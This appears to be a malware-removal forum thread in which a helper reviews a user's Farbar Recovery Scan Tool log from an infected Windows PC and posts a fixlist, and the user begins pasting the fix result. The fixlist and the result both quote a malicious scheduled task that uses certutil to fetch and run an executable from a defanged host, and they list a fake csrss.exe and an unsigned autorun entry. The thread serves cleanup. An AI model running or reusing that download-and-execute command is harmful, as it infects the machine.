FirewallRules: [{99CE8752-A44F-4307-A1EE-4F54DEA2A760}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmgr_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{0ADB4278-50BC-4AFE-AAE9-EFE1BB2E4547}] => (Allow) C:\Program Files\SoftEther VPN Client\vpncmd_x64.exe (SoftEther Corporation -> SoftEther VPN Project at University of Tsukuba, Japan.)
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [{A79F7F72-CB8D-485D-B340-54C21C43C48B}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\EWSProxy.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2936F1E8-01AA-413E-BF0B-9B7345CD6630}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{795728F4-FA31-4D9B-A4AB-78BB97087FA6}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{CC296BD8-C7AE-41FF-ADE9-3E0587CC9E2F}] => (Allow) LPort=5357
FirewallRules: [{35CA4271-53ED-4C97-986D-044960622E1F}] => (Allow) C:\Program Files\HP\HP LaserJet MFP M28-M31\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{7AC26099-BE7F-4BFA-BEAF-FB184655BFC1}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{178817BF-A27F-4435-B34B-EEB2ECFB48E7}] => (Allow) C:\ProgramData\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ent\LogiOptionsMgr.EXE (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{8A4FB251-5506-42DA-AB5C-14C992BB4DFE}] => (Allow) C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]
FirewallRules: [{9D9FB80D-2A4F-444D-B2C1-818FF186B9B7}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{ABD7F869-8C07-4289-8160-327C6CF23E5A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Restore Points =========================


==================== Faulty Device Manager Devices ============

Name: Bluetooth Server
Description: Bluetooth Server
Class Guid: {34446e8e-37b4-4b16-9da6-bea2db33465a}
Manufacturer: Intel Corporation
Service: btmaux
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: WinmonProcessMonitor
Description: WinmonProcessMonitor
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: WinmonProcessMonitor
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Periférne zariadenie Bluetooth
Description: Periférne zariadenie Bluetooth
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: ========================

Application errors:
==================
Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/07/2020 08:51:17 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (02/07/2020 08:44:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (02/07/2020 08:43:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3006) (User: NT AUTHORITY)
Description: Unable to read the performance counter strings defined for the 01B language ID. The first DWORD in the Data section contains the Win32 error code.

Error: (02/07/2020 08:43:32 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (02/07/2020 08:39:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (02/07/2020 08:57:43 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/07/2020 08:57:42 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 70.

Error: (02/07/2020 08:44:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Nasledujúce ovládače pre spustenie zavedenia alebo spustenie systému zlyhali pri načítaní:
cdrom

Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Spustenie služby Windows Media Player - služba zdieľania v sieti zlyhalo kvôli nasledujúcej chybe:
Pretože zlyhalo prihlásenie, službu sa nepodarilo spustiť.

Error: (02/07/2020 08:43:39 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Službe WMPNetworkSvc sa nepodarilo s aktuálne nakonfigurovaným heslom prihlásiť ako NT AUTHORITY\NetworkService kvôli nasledujúcej chybe:
Požiadavka nie je podporovaná.


Ak chcete zabezpečiť správne nakonfigurovanie služby, použite modul Služby konzoly MMC (Microsoft Management Console).

Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll

Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll

Error: (02/07/2020 08:43:27 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: Modul WLAN Extensibility Module sa neočakávane zastavil.

Cesta k modulu: C:\Windows\System32\IWMSSvc.dll


Windows Defender:
===================================
Date: 2019-09-17 22:50:36.541
Description:
Windows Defender scan has been stopped before completion.
Scan ID:{D3AB2F47-DE50-48D7-A60C-9877224729C3}
Scan Type:AntiSpyware
Scan Parameters:Quick Scan

Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.271.442.0
Previous Signature Version:1.269.1075.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Error code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.

Date: 2018-07-04 22:05:48.863
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.15000.2
Previous Engine Version:1.1.14901.4
Update Source:User
Error Code:0x80070666
Error description:Už je nainštalovaná iná verzia produktu. Inštaláciu tejto verzie nemožno dokončiť. Ak chcete existujúcu verziu produktu nakonfigurovať alebo odstrániť, použite ovládací panel Pridať alebo odstrániť programy.

CodeIntegrity:
===================================

Date: 2020-02-07 20:39:10.913
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-02-07 20:39:10.897
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-02-06 20:58:11.850
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-02-06 20:58:11.835
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:16.111
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:16.096
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:01.178
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2020-01-26 22:55:01.147
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\WinmonProcessMonitor.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: TOSHIBA 1.90 09/19/2014
Motherboard: TOSHIBA VG10S
Processor: Intel(R) Core(TM) i7-4700MQ CPU @ 2.40GHz
Percentage of memory in use: 38%
Total physical RAM: 8103.89 MB
Available physical RAM: 5005.23 MB
Total Virtual: 22102.04 MB
Available Virtual: 17834.01 MB

==================== Drives ================================

Drive c: (Windows 7) (Fixed) (Total:143.37 GB) (Free:13.22 GB) NTFS
Drive d: (Windows 10) (Fixed) (Total:94.4 GB) (Free:12.33 GB) NTFS
Drive e: (data) (Fixed) (Total:465.76 GB) (Free:24.75 GB) NTFS

\\?\Volume{fddfa42c-f3c0-11e7-944c-806e6f6e6963}\ (Vyhradené systémom) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
\\?\Volume{ff0173d9-491a-11ea-9cd7-806e6f6e6963}\ () (Fixed) (Total:0.61 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: C14F8450)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=143.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=94.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=622 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 3C2BC5FC)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Rudy
Site Admin
Posts: 118275
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my FRST log

#6 Post by Rudy »

Open Notepad and copy the following into it:
Start

CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{F9AB2B23-2AC6-4DE0-A7FB-1DB375AED956}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [{72A5A12A-716B-4CFA-BD0C-3A90C219130B}] => (Block) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [TCP Query User{4218553C-8414-4FC1-AC03-AABE1168B85F}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [UDP Query User{B0D9DA1F-9B8B-4AB9-862B-90F0B455C8B4}C:\program files\java\jre1.8.0_231\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_231\bin\javaw.exe No File
FirewallRules: [{63563E85-64C7-44E9-BB6F-8669228E4EF9}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E5FB062C-8C90-4693-89F6-FB1FDBE0DE5B}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{E3904F86-8649-41ED-8BE1-960F80CE1B03}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File
FirewallRules: [{2D08EE70-88F2-4649-8299-B182B79733E6}] => (Allow) C:\Program Files (x86)\VideoLAN\VLC\vlc.exe No File

EmptyTemp:
End
Save it to your desktop as fixlist.txt. Run FRST again and click >Fix<. When it finishes, a log will appear; copy it here.
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

Re: Please check my FRST log

#7 Post by Jomko »

Fix result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (07-02-2020 22:54:55) Run:1
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [646160 2019-12-11] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\Run: [CloudNet] => C:\Users\Jomko\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-02-07] (EpicNet Inc.) [File not signed] <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {28B0A694-674F-4F77-AE22-288A79215844} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bestblues.tech/app/app.exe C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe && C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.exe /31340 <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
Task: {93DFD860-E586-4829-B68C-290557118ECF} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3962368 2020-01-22] () [File not signed] <==== ATTENTION
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
U3 MBAMService; no ImagePath
S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X]
S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
C:\Windows\system32\Tasks\{E0E271FE-355F-411F-8E13-4141203B01DE}
C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers1: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll -> No File
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Jomko\GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGi.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe No File
FirewallRules: [TCP Query User{9747B657-A166-43E8-831D-33F204BC2790}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [UDP Query User{23B54518-BFAE-44C0-BD71-1342B40C49A7}C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe] => (Allow) C:\program files (x86)\wondershare\mobilego\mobilegoservice.exe No File
FirewallRules: [{36E5F241-C08F-46E0-9466-1BC748A813DD}] => (Allow) C:\Users\Jomko\AppData\Local\Temp\7zS4058\HP.EasyStart.exe No File
FirewallRules: [TCP Query User{65CCA3BC-5E01-4C02-8A65-D444D4094BDA}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
FirewallRules: [UDP Query User{5AA0508D-A7ED-409E-8567-CA6F25C48CC2}C:\program files (x86)\emule\emule.exe] => (Allow) C:\program files (x86)\emule\emule.exe No File
